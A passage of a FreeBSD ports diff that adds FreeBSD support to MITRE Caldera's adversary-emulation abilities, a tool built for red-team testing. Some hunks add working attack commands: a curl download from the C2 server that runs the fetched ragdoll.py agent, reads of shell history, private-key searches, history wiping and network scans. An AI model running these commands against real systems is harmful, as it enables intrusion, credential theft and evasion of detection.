b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml new file mode 100644 index 000000000000..d9d913ade3c7 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml +@@ -27,7 +27,7 @@ + - source: host.file.path + edge: has_extension + target: file.sensitive.extension +- linux: ++ freebsd,linux: + sh: + command: | + find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\.*' -size -500k 2>/dev/null | head -5 diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_b007fe0c-c6b0-4fda-915c-255bbc070de2.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_b007fe0c-c6b0-4fda-915c-255bbc070de2.yml new file mode 100644 index 000000000000..c21d7db379f6 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_b007fe0c-c6b0-4fda-915c-255bbc070de2.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml +@@ -16,7 +16,7 @@ + psh,pwsh: + command: | + Get-Clipboard -raw +- linux: ++ freebsd,linux: + sh: + command: | + xclip -o diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_command-and-control_0ab383be-b819-41bf-91b9-1bd4404d83bf.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_command-and-control_0ab383be-b819-41bf-91b9-1bd4404d83bf.yml new file mode 100644 index 000000000000..e369cd256f0c --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_command-and-control_0ab383be-b819-41bf-91b9-1bd4404d83bf.yml @@ -0,0 +1,15 @@ +--- plugins/stockpile/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml +@@ -24,3 +24,12 @@ + python ragdoll.py -W $server#{app.contact.html} + cleanup: | + pkill -f ragdoll ++ freebsd: ++ sh: ++ command: | ++ server="#{app.contact.http}"; ++ curl -s -X POST -H "file:ragdoll.py" -H "platform:freebsd" $server/file/download > ragdoll.py; ++ pip install requests beautifulsoup4; ++ python ragdoll.py -W $server#{app.contact.html} ++ cleanup: | ++ pkill -f ragdoll diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_credential-access_422526ec-27e9-429a-995b-c686a29561a4.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_credential-access_422526ec-27e9-429a-995b-c686a29561a4.yml new file mode 100644 index 000000000000..e618197bae13 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_credential-access_422526ec-27e9-429a-995b-c686a29561a4.yml @@ -0,0 +1,12 @@ +--- plugins/stockpile/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml +@@ -20,3 +20,9 @@ + parsers: + plugins.stockpile.app.parsers.ssh: + - source: remote.ssh.cmd ++ freebsd: ++ sh: ++ command: cat ~/.history ++ parsers: ++ plugins.stockpile.app.parsers.ssh: ++ - source: remote.ssh.cmd diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_credential-access_de632c2d-a729-4b77-b781-6a6b09c148ba.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_credential-access_de632c2d-a729-4b77-b781-6a6b09c148ba.yml new file mode 100644 index 000000000000..6558aabecb22 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_credential-access_de632c2d-a729-4b77-b781-6a6b09c148ba.yml @@ -0,0 +1,13 @@ +--- plugins/stockpile/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml +@@ -19,7 +19,7 @@ + sh: + command: | + for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name "*${i}" 2>/dev/null;done; +- linux: ++ freebsd,linux: + sh: + command: | +- for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name "*${i}" 2>/dev/null;done; +\ No newline at end of file ++ for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name "*${i}" 2>/dev/null;done; diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_36eecb80-ede3-442b-8774-956e906aff02.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_36eecb80-ede3-442b-8774-956e906aff02.yml new file mode 100644 index 000000000000..81bbb5325bd5 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_36eecb80-ede3-442b-8774-956e906aff02.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml +@@ -11,7 +11,7 @@ + darwin: + sh: + command: sleep 60 +- linux: ++ freebsd,linux: + sh: + command: sleep 60 + windows: diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_43b3754c-def4-4699-a673-1d85648fda6a.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_43b3754c-def4-4699-a673-1d85648fda6a.yml new file mode 100644 index 000000000000..6d8cfc3162c4 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_43b3754c-def4-4699-a673-1d85648fda6a.yml @@ -0,0 +1,15 @@ +--- plugins/stockpile/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml +@@ -16,6 +16,10 @@ + sh: + command: | + > $HOME/.bash_history && unset HISTFILE ++ freebsd: ++ sh: ++ command: | ++ > $HOME/.history && set history = 0 + windows: + psh: +- command: Clear-History;Clear +\ No newline at end of file ++ command: Clear-History;Clear diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_4cd4eb44-29a7-4259-91ae-e457b283a880.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_4cd4eb44-29a7-4259-91ae-e457b283a880.yml new file mode 100644 index 000000000000..51d0b7dd24dd --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_4cd4eb44-29a7-4259-91ae-e457b283a880.yml @@ -0,0 +1,17 @@ +--- plugins/stockpile/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml +@@ -12,11 +12,11 @@ + sh: + cleanup: | + rm #{payload} +- linux: ++ freebsd,linux: + sh: + cleanup: | + rm #{payload} + windows: + psh,pwsh: + cleanup: | +- Remove-Item -Force -Path "#{payload}" +\ No newline at end of file ++ Remove-Item -Force -Path "#{payload}" diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_5f844ac9-5f24-4196-a70d-17f0bd44a934.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_5f844ac9-5f24-4196-a70d-17f0bd44a934.yml new file mode 100644 index 000000000000..d5ca5155314f --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_5f844ac9-5f24-4196-a70d-17f0bd44a934.yml @@ -0,0 +1,15 @@ +--- plugins/stockpile/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml +@@ -25,9 +25,9 @@ + path="$(pwd)/#{exe_name}"; + num_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep "$path"; done | wc -l); + if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi; +- linux: ++ freebsd,linux: + sh: + command: | + path="$(pwd)/#{exe_name}"; + num_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep "$path"; done | wc -l); +- if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi; +\ No newline at end of file ++ if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi; diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_30732a56-4a23-4307-9544-09caf2ed29d5.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_30732a56-4a23-4307-9544-09caf2ed29d5.yml new file mode 100644 index 000000000000..eb1e2728e0be --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_30732a56-4a23-4307-9544-09caf2ed29d5.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml +@@ -12,7 +12,7 @@ + sh: + command: | + find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \; +- linux: ++ freebsd,linux: + sh: + command: | + find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \; diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_335cea7b-bec0-48c6-adfb-6066070f5f68.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_335cea7b-bec0-48c6-adfb-6066070f5f68.yml new file mode 100644 index 000000000000..f85f5fb163dd --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_335cea7b-bec0-48c6-adfb-6066070f5f68.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml +@@ -12,7 +12,7 @@ + sh: + command: | + ps +- linux: ++ freebsd,linux: + sh: + command: | + ps diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml new file mode 100644 index 000000000000..1f0678a03bf0 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml +@@ -12,7 +12,7 @@ + sh: + command: | + nmap -sV -p #{remote.host.port} #{remote.host.ip} +- linux: ++ freebsd,linux: + sh: + command: | + nmap -sV -p #{remote.host.port} #{remote.host.ip} diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml new file mode 100644 index 000000000000..9b6d16a6890e --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml +@@ -12,7 +12,7 @@ + sh: + command: | + ps aux | grep #{host.user.name} +- linux: ++ freebsd,linux: + sh: + command: | + ps aux | grep #{host.user.name} diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml new file mode 100644 index 000000000000..537f8779c2a9 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml @@ -0,0 +1,17 @@ +--- plugins/stockpile/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml +@@ -28,3 +28,14 @@ + target: remote.host.port + payloads: + - scanner.py ++ freebsd: ++ sh: ++ command: | ++ python3.9 scanner.py -i #{remote.host.ip} ++ parsers: ++ plugins.stockpile.app.parsers.scan: ++ - source: remote.host.ip ++ edge: has_open_port ++ target: remote.host.port ++ payloads: ++ - scanner.py diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml new file mode 100644 index 000000000000..e29e243da46c --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml +@@ -12,7 +12,7 @@ + sh: + command: | + ls +- linux: ++ freebsd,linux: + sh: + command: | + ls diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml new file mode 100644 index 000000000000..4adc35e7b332 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml @@ -0,0 +1,12 @@ +--- plugins/stockpile/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml +@@ -42,6 +42,6 @@ + darwin: + sh: + command: ps aux +- linux: ++ freebsd,linux: + sh: +- command: ps aux +\ No newline at end of file ++ command: ps aux diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml new file mode 100644 index 000000000000..493ff051dcdd --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml @@ -0,0 +1,12 @@ +--- plugins/stockpile/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml +@@ -15,6 +15,6 @@ + darwin: + sh: + command: groups +- linux: ++ freebsd,linux: + sh: +- command: groups +\ No newline at end of file ++ command: groups diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml new file mode 100644 index 000000000000..09037b912637 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml +@@ -12,7 +12,7 @@ + sh: + command: | + cat ~/.ssh/known_hosts +- linux: ++ freebsd,linux: + sh: + command: | + cat ~/.ssh/known_hosts diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_638fb6bb-ba39-4285-93d1-7e4775b033a8.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_638fb6bb-ba39-4285-93d1-7e4775b033a8.yml new file mode 100644 index 000000000000..5c197bd60b6a --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_638fb6bb-ba39-4285-93d1-7e4775b033a8.yml @@ -0,0 +1,13 @@ +--- plugins/stockpile/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml +@@ -15,6 +15,10 @@ + sh: + command: | + netstat -anto ++ freebsd: ++ sh: ++ command: | ++ netstat -aSp tcp + windows: + psh: + command: | diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_6c91884e-11ec-422f-a6ed-e76774b0daac.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_6c91884e-11ec-422f-a6ed-e76774b0daac.yml new file mode 100644 index 000000000000..400b12042c7a --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_6c91884e-11ec-422f-a6ed-e76774b0daac.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml +@@ -14,7 +14,7 @@ + - source: host.print.file + edge: has_size + target: host.print.size +- linux: ++ freebsd,linux: + sh: + command: lpq -a + parsers: diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_6e1a53c0-7352-4899-be35-fa7f364d5722.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_6e1a53c0-7352-4899-be35-fa7f364d5722.yml new file mode 100644 index 000000000000..8daee82cafc7 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_6e1a53c0-7352-4899-be35-fa7f364d5722.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml +@@ -12,7 +12,7 @@ + sh: + command: | + pwd +- linux: ++ freebsd,linux: + sh: + command: | + pwd diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_830bb6ed-9594-4817-b1a1-c298c0f9f425.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_830bb6ed-9594-4817-b1a1-c298c0f9f425.yml new file mode 100644 index 000000000000..97137b959bd7 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_830bb6ed-9594-4817-b1a1-c298c0f9f425.yml @@ -0,0 +1,10 @@ +--- plugins/stockpile/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml +@@ -16,3 +16,7 @@ + sh: + command: | + which google-chrome ++ freebsd: ++ sh: ++ command: | ++ which chrome diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_85341c8c-4ecb-4579-8f53-43e3e91d7617.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_85341c8c-4ecb-4579-8f53-43e3e91d7617.yml new file mode 100644 index 000000000000..c48e5c1e638d --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_85341c8c-4ecb-4579-8f53-43e3e91d7617.yml @@ -0,0 +1,18 @@ +--- plugins/stockpile/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml +@@ -14,7 +14,7 @@ + parsers: + plugins.stockpile.app.parsers.ipaddr: + - source: remote.host.ip +- linux: ++ freebsd,linux: + sh: + command: arp -a + parsers: +@@ -25,4 +25,4 @@ + command: arp -a + parsers: + plugins.stockpile.app.parsers.ipaddr: +- - source: remote.host.ip +\ No newline at end of file ++ - source: remote.host.ip diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_9849d956-37ea-49f2-a8b5-f2ca080b315d.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_9849d956-37ea-49f2-a8b5-f2ca080b315d.yml new file mode 100644 index 000000000000..322ba3f70c2b --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_9849d956-37ea-49f2-a8b5-f2ca080b315d.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml +@@ -12,7 +12,7 @@ + sh: + command: | + which go +- linux: ++ freebsd,linux: + sh: + command: | + which go diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_a41c2324-8c63-4b15-b3c5-84f920d1f226.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_a41c2324-8c63-4b15-b3c5-84f920d1f226.yml new file mode 100644 index 000000000000..803f409699a0 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_a41c2324-8c63-4b15-b3c5-84f920d1f226.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml +@@ -6,7 +6,7 @@ + attack_id: T1083 + name: File and Directory Discovery + platforms: +- linux: ++ freebsd,linux: + sh: + command: 'find ~ -type f -name #{host.print.file} 2>/dev/null' + parsers: diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml new file mode 100644 index 000000000000..0c923801e46a --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml @@ -0,0 +1,13 @@ +--- plugins/stockpile/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml +@@ -16,6 +16,10 @@ + sh: + command: | + python3 --version;python2 --version;python --version ++ freebsd: ++ sh: ++ command: | ++ pkg version -x python3 | cut -d '-' -f2 | awk '{print $1}' && pkg version -x python2 | cut -d '-' -f2 | awk '{print $1}' + windows: + cmd: + command: | diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_b6f545ef-f802-4537-b59d-2cb19831c8ed.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_b6f545ef-f802-4537-b59d-2cb19831c8ed.yml new file mode 100644 index 000000000000..0f35c6455ab4 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_b6f545ef-f802-4537-b59d-2cb19831c8ed.yml @@ -0,0 +1,13 @@ +--- plugins/stockpile/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml +@@ -8,7 +8,7 @@ + attack_id: T1016 + name: System Network Configuration Discovery + platforms: +- darwin: ++ darwin,freebsd: + sh: + command: | +- ifconfig | grep broadcast +\ No newline at end of file ++ ifconfig | grep broadcast diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_bd527b63-9f9e-46e0-9816-b8434d2b8989.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_bd527b63-9f9e-46e0-9816-b8434d2b8989.yml new file mode 100644 index 000000000000..bd45cfbb221f --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_bd527b63-9f9e-46e0-9816-b8434d2b8989.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml +@@ -12,7 +12,7 @@ + sh: + command: | + whoami +- linux: ++ freebsd,linux: + sh: + command: | + whoami diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_c0da588f-79f0-4263-8998-7496b1a40596.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_c0da588f-79f0-4263-8998-7496b1a40596.yml new file mode 100644 index 000000000000..01803f22087a --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_c0da588f-79f0-4263-8998-7496b1a40596.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml +@@ -15,7 +15,7 @@ + plugins.stockpile.app.parsers.basic: + - source: host.user.name + - source: domain.user.name +- linux: ++ freebsd,linux: + sh: + command: whoami + parsers: diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml new file mode 100644 index 000000000000..bd9b22860d08 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml +@@ -15,7 +15,7 @@ + parsers: + plugins.stockpile.app.parsers.basic: + - source: host.user.name +- linux: ++ freebsd,linux: + sh: + command: | + cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#' diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_ce485320-41a4-42e8-a510-f5a8fe96a644.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_ce485320-41a4-42e8-a510-f5a8fe96a644.yml new file mode 100644 index 000000000000..7e128a92b5ad --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_ce485320-41a4-42e8-a510-f5a8fe96a644.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml +@@ -8,7 +8,7 @@ + attack_id: T1018 + name: Remote System Discovery + platforms: +- linux: ++ freebsd,linux: + sh: + command: host "#{target.org.domain}" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev + parsers: diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml new file mode 100644 index 000000000000..4dbd92f81fad --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml.orig 2022-09-14 02:24:22 UTC ++++ 